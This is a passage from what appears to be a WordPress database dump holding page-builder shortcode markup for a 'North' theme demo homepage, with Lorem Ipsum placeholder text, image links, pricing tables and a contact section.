css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\r\n<h1>PARALLAX WITH DEGRADE</h1>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\r\n\r\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506097407{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\" video=\"mSLAF_DjiDU\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe26b885-0403\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe26b885-0403\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe26b885-0403\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home','','publish','open','open','','home','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/workshops/north/north2/?page_id=1916',0,'page','',0),(1930,1,'2014-09-15 03:14:21','2014-09-15 03:14:21','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"545,546,547\" text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\r\n<h1>PARALLAX WITH DEGRADE</h1>\r\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\r\n\r\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of 